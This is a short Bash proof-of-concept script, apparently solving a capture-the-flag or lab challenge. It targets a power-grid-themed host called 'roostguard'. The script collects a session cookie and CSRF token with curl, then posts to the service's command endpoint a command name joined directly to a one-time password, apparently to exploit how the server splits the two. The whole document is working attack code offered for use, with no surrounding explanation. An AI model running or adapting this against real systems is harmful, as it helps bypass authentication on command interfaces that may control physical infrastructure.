#!/usr/bin/env bash
set -euo pipefail

# Usage:
#   poc_hotp.sh <COMMAND> <OTP>
#   poc_hotp.sh "<COMMAND><OTP>"
# Examples:
#   poc_hotp.sh HOTP 119700
#   poc_hotp.sh "HOTP119700"

if [ "$#" -eq 0 ]; then
  echo "Usage: $0 <COMMAND> <OTP>   OR   $0 \"<COMMAND><OTP>\""
  echo "Example: $0 HOTP 119700   OR   $0 \"HOTP119700\""
  exit 2
fi

# Determine combined payload:
if [ "$#" -eq 1 ]; then
  COMBINED="$1"
else
  # join first two args; ignore extras (or you can join them if needed)
  COMBINED="${1}${2}"
fi

# Optional: basic sanity check (uncomment to enforce)
# if ! [[ "$COMBINED" =~ ^[A-Za-z]+[0-9]+$ ]]; then
#   echo "Warning: combined payload does not match expected pattern (letters then digits): $COMBINED" >&2
# fi

BASE="http://roostguard.falcon.powergrid.tcc"
LOGIN="$BASE/login"
COMMAND_URL="$BASE/command"

COOKIE="$(mktemp)"
trap 'rm -f "$COOKIE"' EXIT

UA="Mozilla/5.0"

# Fetch login page to get cookie + CSRF
curl -sS -L -c "$COOKIE" -A "$UA" --fail "$LOGIN" -o login.html

CSRF="$(grep -oP 'name="csrf-token"\s+content="\K[^"]+' login.html || true)"
if [ -z "$CSRF" ]; then
  echo "Erreur: token CSRF introuvable dans login.html" >&2
  sed -n '1,120p' login.html >&2
  exit 3
fi

# Send single combined command (no separator)
curl -sS -L -b "$COOKIE" \
  --data-urlencode "command=${COMBINED}" \
  --data-urlencode "csrf_token=${CSRF}" \
  -A "$UA" --fail "$COMMAND_URL"
